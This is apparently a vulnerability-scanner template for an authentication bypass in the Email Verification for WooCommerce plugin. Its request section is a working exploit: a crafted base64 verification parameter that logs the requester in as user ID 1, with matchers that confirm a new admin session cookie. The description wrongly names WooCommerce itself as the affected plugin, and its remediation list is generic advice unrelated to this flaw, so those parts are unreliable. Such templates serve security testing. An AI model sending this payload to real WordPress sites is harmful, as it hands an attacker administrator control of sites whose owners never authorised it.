id: wp-woocommerce-email-verification
info:
  name: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication
    Bypass
  author:
  - l0ne1y
  description: |-
    WordPress plugin WooCommerce code issue leads to login vulnerability for any user as administrator
    WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed using PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers. WordPress plugin is an application plugin.

    WordPress plugin WooCommerce This plugin is affected by a loose compare issue that could allow any user to log in as an administrator.
  severity: critical
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.org/plugins/woocommerce
    Temporary fix:
    1. The front and back ends verify user input information at the same time, a double verification mechanism.
    2. Before calling the function, verify whether the user has the permission to call the relevant function.
    3. The encrypted resource ID referenced by the direct object prevents attackers from enumerating IDs and specializes in handling sensitive data.
    4. Use a mature permission management framework, such as spring security.
    5. The user's credentials for access operations (such as user ID, product number, order serial number, etc.) are preferably obtained by associating the session on the server side or encrypting it and placing it in the session.
    6. When a form or other parameters must be used to submit the user's credentials for access operations (such as user ID, product number, order serial number, etc.), a construction method that is difficult to guess (adding letters and random numbers, etc.) should be used as much as possible or a complex encryption algorithm should be used to encrypt and submit. The credentials and session permissions submitted by the client should be strictly verified, such as whether the submitted product number is a product number belonging to the logged-in user.
    7. Conduct strict permission verification on the management function modules. If not necessary, it is recommended not to open the Internet or perform access control at the network layer.
requests:
- matchers:
  - type: regex
    part: header
    regex:
    - wordpress_logged_in_[a-z0-9]{32}
  - type: word
    condition: and
    part: body
    words:
    - Your account has been activated!
    - From your account dashboard you can view your
  - type: status
    status:
    - 200
  matchers-condition: and
  path:
  - '{{BaseURL}}/my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0='
  - '{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0='
  method: GET
  stop-at-first-match: true
